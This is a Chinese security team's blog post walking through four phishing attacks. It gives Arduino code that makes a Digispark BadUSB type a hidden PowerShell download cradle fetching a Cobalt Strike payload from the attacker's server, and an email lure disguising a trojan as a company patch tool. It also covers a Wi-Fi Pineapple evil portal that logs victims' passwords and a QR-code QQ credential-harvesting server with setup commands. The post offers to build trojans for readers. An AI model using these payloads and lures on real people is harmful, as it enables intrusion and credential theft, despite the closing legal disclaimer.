Badusb钓鱼CS上线
使用工具Digispark,形似U盘,使用Arduino编译器往其中烧录程序
安装Arduino调试软件
打开Arduino官网,点击Software。
https://www.arduino.cc
下载Windows版本软件(右边写着Win7 or newer那个)进行安装
安装软件即可,其中会提示你装一个USB驱动,点击安装就行
安装成功则如下图所示
在Arduino开发板中配置Digispark
在“附加开发板管理器网址”中,添加:
https://raw.githubusercontent.com/ArminJo/DigistumpArduino/master/package_digistump_index.json
点击“开发版管理”,并且搜索digistump,便可以找到这个开发版配置信息,安装这个“Digistump AVR Boards”
依次点击“开发板“ -> ”Digistump AVR Boards“ -> ”Digispark(Default - 16.5mhz)“
上传程序
上传要执行的程序即可,输入要上传的代码,并且点击这个向右的箭头即可上传(左边这个是验证,上传包括了验证的步骤)
上传的时候会让你把程序保存在一个地方,随便保存到一个地方
案例一:弹窗记事本
如要弹窗记事本,则烧录如下程序
#include "DigiKeyboard.h"
void setup() {//初始化
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
delay(500);
DigiKeyboard.println("notepad");
delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}
void loop()//循环
{
}
案例二:CS上线
其中xxxx为cs HTTP上线地址
#include <DigiKeyboardFr.h>
void setup() {
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_CAPSLOCK);
DigiKeyboard.delay(500);
DigiKeyboard.println("powershell.exe -nop -w hidden -c 'IEX ((new-object net.webclient).downloadstring('xxxx'))'");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.sendKeyStroke(KEY_CAPSLOCK);
}
void loop()
{
}
插入Digispark即可上线
邮件钓鱼CS上线
邮件内容
邮件内容(这块需要使用者自己编写一段):
近期出现了xx漏洞,公司联系xx厂商提供了xx漏洞修复工具,请各位员工务必打开进行修复
修复工具下载:
当受害者点击链接的时候,便会下载攻击者服务器上的木马文件,然后双击打开即会在攻击者的CS teamserver上上线
上线木马
安全规则补丁包
(此安全规则布丁包.exe即为上线木马文件,会上线笔者这边的cs,如果使用者需要上线自己服务器的话,需要使用者对自己cs加上https证书,然后给笔者发送自己cs的64位shellcode,我们这边来生成相关exe)
Wifi-Pineapple(菠萝派) Wi-Fi钓鱼信息收集
启动菠萝派,安装4根网线并插入电源
启动菠萝派
连接已经设置好的菠萝派管理WIFI:CMCC-yxaq
WIFI密码为:yx123456
打开浏览器,访问菠萝派管理地址:xx.xx.xx.xx:xxxx
管理密码依然为:yx123456
即可访问Wifi Pineapple的管理地址
配置网络桥接(使菠萝派联网)
此操作的目的是为了达到逻辑上 受害者->菠萝派->互联网的网络结构,使得受害者连接上菠萝派的钓鱼wifi后依然能上网,但是受害者并不知道他和互联网之间夹着个菠萝派
(当点击scan扫描不到wifi时,可以多点击几遍,直到扫描到可用wifi)
使用Evil Portal插件进行钓鱼
然后受害者就会在自己的WIFI里边搜索到,“XXXX内部公用WIFI”,下来就会弹窗出现登陆页面
输入密码即会被钓鱼
如果你想要对钓鱼网页进行修改
当你已经对菠萝派进行网络桥接以后,菠萝派本身就可以连接外部网络了
连接上刚才创建的菠萝派管理地址CMCC-yxaq,使用xshell或者命令行的ssh连接工具,使用ssh登陆菠萝派的命令行终端
用户名root,密码同样是yx123456
登陆成功后显示是这个样子
使用命令进入到portal-yxaq目录
cd portals/yxaq/
便可以看到相关网页文件了,修改就行了
如何查看被钓鱼的密码
登陆到菠萝派后台,进入portal/yxaq文件夹
密码即存储在pwd.txt文件里边
二维码钓鱼信息收集
让受害者直接扫描二维码,即可弹出QQ空间的弹窗(只是演示用,修改其前端页面可以使之更加仿真),受害者填写账号密码,即可在服务端收到其填写的信息,造成信息泄漏
自己搭建一个二维码钓鱼服务器的接受端
访问github有详细搭建教程:
https://github.com/Resek4/QQFishing
在自己的服务器上搭建此服务(需要提前安装docker-compose),然后依次执行以下命令:
git clone https://github.com/Cl0udG0d/QQFishing
cd QQFishing
docker-compose up -d
搭建好后,访问服务器http://IP:5000即可访问其钓鱼地址
生成二维码
百度随便搜索一个可以嵌入图片的二维码生成在线工具,例如
https://cn.online-qrcode-generator.com
将钓鱼URL生成为二维码,受害者扫描二维码即可达到打开钓鱼网页的目的,例如
(此二维码只是个事例,使用者需要自己重新生成)
-
请严格遵守网络安全法相关条例!此分享主要用于交流学习,若用于其他用途,一切后果自付。
-END-
如果本文对您有帮助,来个点赞、在看就是对我们莫大的鼓励。
推荐关注:
团队全员均持CISP-PTE(注册信息安全专业人员-渗透测试工程师)认证,积极参与着各类网络安全赛事并屡获佳绩,同时多次高水准的完成了国家级、省部级攻防演习活动以及相关重报工作,均得到甲方的一致青睐与肯定。
原文始发于微信公众号(弱口令安全实验室):四种钓鱼场景演示
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论